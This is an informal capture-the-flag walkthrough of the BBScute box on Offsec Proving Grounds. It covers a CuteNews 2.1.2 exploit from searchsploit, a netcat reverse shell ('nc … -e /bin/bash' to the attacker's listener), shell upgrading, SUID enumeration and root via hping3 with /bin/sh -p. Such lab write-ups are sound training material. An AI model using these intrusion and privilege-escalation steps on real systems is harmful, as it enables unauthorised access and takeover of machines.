This walkthrough is for the box BBScute on Offsec’s Proving Grounds
It’s a rainy, cold day so I’m staying in to hack a box.
– Nmap scan, found 22, 80, 88, 110 and 995 open
– Browse to the IP and notices CuteNews 2.1.2 at the bottom of index.php
– Searchsploit found a python script that exploits a known vuln.
– Somehow found that I needed to $sed -i ‘s:CuteNews/::g’ 48800.py found in searchsploit. Stumbled upon that.
– python3 48800.py and enter http://192.168.211.128 and it dumps you into an unpriv shell for www-data user
– You must enter http:// without the index.php
– The script connects, exploits it but lists the user account/password you can use to log into the platform:
– Registration successful with username: vGOU9LOe1c and password: vGOU9LOe1c (Or some random characters)
So, go to http://target/index.php and login. Maybe file upload for lfi?
– Steps review to get shell
– Fix the shell with netcat. command > nc 192.168.45.169 4444 -e /bin/bash (Or some other free port)
– First open your netcat listener with nc -nvlp 4444
– You get a better shell and can find the first flag with find / -name flag.txt 2>/dev/null
– Then harden the shell with python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ for a nice, toasty shell
– Don’t do anything in a remote shell that would cause you to do a Ctrl+C because it also kills the shell. (Like, don’t ping or wget stuff.)
– While you’re there, get /etc/passwd for usernames:
fox:x:1000:1000:fox,,,:/home/fox:/bin/bash
– Flag was found in var/www/local.txt so they can be anywhere but more commonly, they’re in /home/username directory
– find / -perm -u=s -type f 2>/dev/null (-u=s finds suid bit files for exploit) Found a few incl chsh, chfn, gpasswd, su, pkexec, sudo, umount, newgrp, fus>
– Hopped over to gtfobins.github.io to find something on hping3. Keyword search hping3, then click suid
– Run hping3 because it runs as root, then /bin/sh -p and it dumps you to a root shell, then cd into /root/ for proof.txt
Sweet.
Overview for getting reverse shell:
1. Run python script, target is http://192.168.211.128
2. Then nc back into your box with nc 192.168.211.128
3. From your listening nc -nvlp 4444, improve the shell with the import python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
4. Don’t use any command that could require you do a ctrl+c because that also breaks the shell. You don’t want that.
Why hping3 with suid bit and /bin/sh -p worked:
– The -p flag in sh (POSIX shell, or often dash or bash) means to not drop privileges — run as the real UID (which, thanks to setuid, is root)
– Normally, /bin/sh drops privileges if it’s launched by a non-root user from a SUID binary.
– But, -p explicitly tells it not to. So the shell runs as UID 0 (root).